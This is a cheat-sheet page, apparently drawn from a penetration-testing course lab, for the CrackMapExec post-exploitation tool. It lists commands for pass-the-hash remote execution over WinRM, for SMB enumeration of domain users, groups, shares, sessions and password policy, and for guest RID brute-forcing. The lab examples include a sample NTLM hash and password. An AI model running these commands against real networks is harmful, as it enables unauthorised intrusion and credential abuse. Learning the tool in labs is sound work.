Skip to content

crackmapexec

CrackMapExec is a post-exploitation tool used for penetration testing and security assessments. CrackMapExec can be used to enumerate users, domains, and computers within a network, extract password hashes and plaintext passwords, execute commands on remote systems, and escalate privileges. It is capable of performing various network attacks such as password spraying, brute-force attacks, and pass-the-hash attacks. It supports various protocols including SMB, HTTP, and LDAP, and can be integrated with other tools like Metasploit and PowerSploit.

  • vnc
  • ssh
  • ftp
  • rdp
  • mssql
  • ldap
  • smb
  • winrm

sudo crackmapexec --help
sudo crackmapexec mssql --help
sudo crackmapexec smb --help
sudo crackmapexec ssh --help
sudo crackmapexec winrm --help

WINRM:5985


crackmapexec winrm <IP> -u <USER> -d <DOMAIN> --port <PORT> -H <NTLM_HASH> -X "hostname" 

crackmapexec winrm $LOCAL -u Administrator -d 'INLANEFREIGHT.LOCAL' --port 5985 -H 27dedb1dab4d8545c6e1c66fba077da0 -X 'ls C:\Users\Administrator\Desktop'

SMB


Enumeration with valid credential

domain user enumeration

sudo crackmapexec smb $IP -u $USER -p $PASS --users
sudo crackmapexec smb $IP -d $DOMAIN -u $USER -p $PASS --users
# sudo crackmapexec smb 172.16.5.5 -d INLANEFREIGHT.LOCAL -u SAPService -p '!SapperFi2' --users | tee ad_users.txt

domain group enumeration

sudo crackmapexec smb $IP -u $USER -p $PASS --groups
# sudo crackmapexec smb 172.16.5.5 -d INLANEFREIGHT.LOCAL -u SAPService -p '!SapperFi2' --groups | tee ad_groups.txt

get members of local group

sudo crackmapexec smb $IP -u $USER -p $PASS --users <USER_NAME> --local-groups '<GROUP_NAME>'
# sudo crackmapexec smb 172.16.5.5 -u SAPService -p '!SapperFi2' --users SAPService --local-groups 'Account Operators'

loggedon user enumeration

sudo crackmapexec smb $IP -u $USER -p $PASS --loggedon-users

share enumeration

sudo crackmapexec smb $IP -u $USER -p $PASS --shares

share enumeration + list all readable files

sudo crackmapexec smb $IP -u $USER -p $PASS -M spider_plus --share '<SHARE_NAME>'

obtain password policy

sudo crackmapexec smb $IP -u $USER -p $PASS --pass-pol


wget https://github.com/Porchetta-Industries/CrackMapExec/releases/download/v5.3.0/cme-ubuntu-latest-3.10.zip -O crackmapexec.zip
unzip crackmapexec.zip
mc cme crackmapexec
crackmapexec smb $IP -u 'guest' -p '' --users
crackmapexec smb $IP -u 'guest' -p '' --shares
crackmapexec smb $IP -u 'guest' -p '' --groups
crackmapexec smb $IP -u 'guest' -p '' --local-groups
crackmapexec smb $IP -u 'guest' -p '' --loggedon-users
crackmapexec smb $IP -u 'guest' -p '' --rid-brute
crackmapexec smb $IP -u 'guest' -p '' --sessions
crackmapexec smb $IP -u 'guest' -p '' --pass-pol

source https://github.com/Porchetta-Industries/CrackMapExec